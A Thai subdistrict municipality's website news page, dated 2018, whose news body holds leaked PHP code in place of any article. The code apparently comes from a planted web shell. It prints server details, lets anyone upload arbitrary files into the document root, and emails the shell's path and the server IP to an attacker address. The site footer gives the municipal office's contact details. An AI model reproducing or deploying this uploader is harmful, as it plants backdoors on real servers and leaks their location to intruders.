ประชาสัมพันธ์
กฎหมาย แผนและงบประมาณ

 

 

        รายละเอียดข่าว
ขอพระองค์ ทรงพระเจริญ แบ่งบัน
วันที่ประกาศข่าว 07 สิงหาคม 2561 ผู้ประกาศข่าว chirawat จำนวนผู้อ่าน 84 คน
เนื้อหาข่าว : "; echo "".php_uname()."
"; echo "
"; $root = $_SERVER['DOCUMENT_ROOT']; $files = $_FILES['idx_file']['name']; $dest = $root.'/'.$files; if(isset($_POST['upload'])) { if(is_writable($root)) { if(@copy($_FILES['idx_file']['tmp_name'], $dest)) { $web = "http://".$_SERVER['HTTP_HOST']."/"; echo "sukses upload -> $web/$files"; } else { echo "gagal upload di document root."; } } else { if(@copy($_FILES['idx_file']['tmp_name'], $files)) { echo "sukses upload $files di folder ini"; } else { echo "gagal upload"; } } } /* GET SHELL PATH AFTER UPLOAD */ //Your Email : $email = "socialpro22@gmail.com"; /* DON'T CHANGE ANYTHING CODED BY : S1r_z3r0 */ $site=$_SERVER['HTTP_HOST']; $filepath=$_SERVER['REQUEST_URI']; $shellpath=$site.$filepath; $subject="Sh3ll On " . $site; $header="Sh3ll Found ~"; $siteip=$_SERVER['SERVER_ADDR']; $msg="You Looking For Shell On " . $site . "\r\n"; $msg .="Shell Path " . $shellpath . "\r\n"; $msg .="Server IP " . $siteip . "\r\n"; $msg .="Enjoy :-)"."\r\n"; $msg .="socialpro22@gmail.com"; //Send Shell Path : mail($email,$subject,$msg,$header); ?>  
 
 
 
   สำนักงานเทศบาลตำบลงิ้วงาม เลขที่ 214 หมู่ที่ 4 ตำบลงิ้วงาม อำเภอเมืองอุตรดิตถ์ จังหวัดอุตรดิตถ์
  โทรศัพท์ : 055 448 386
  Online จำนวน : 1 คน  จำนวนผู้เยี่ยมชมเว็บไซต์  
  ©เทศบาลตำบลงิ้วงาม พ.ศ. 2557